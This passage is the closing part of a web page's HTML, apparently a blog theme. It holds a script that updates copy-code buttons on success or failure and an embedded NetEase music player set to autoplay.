        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>



    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=27896818&auto=1&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
  </div>
</body>

</html>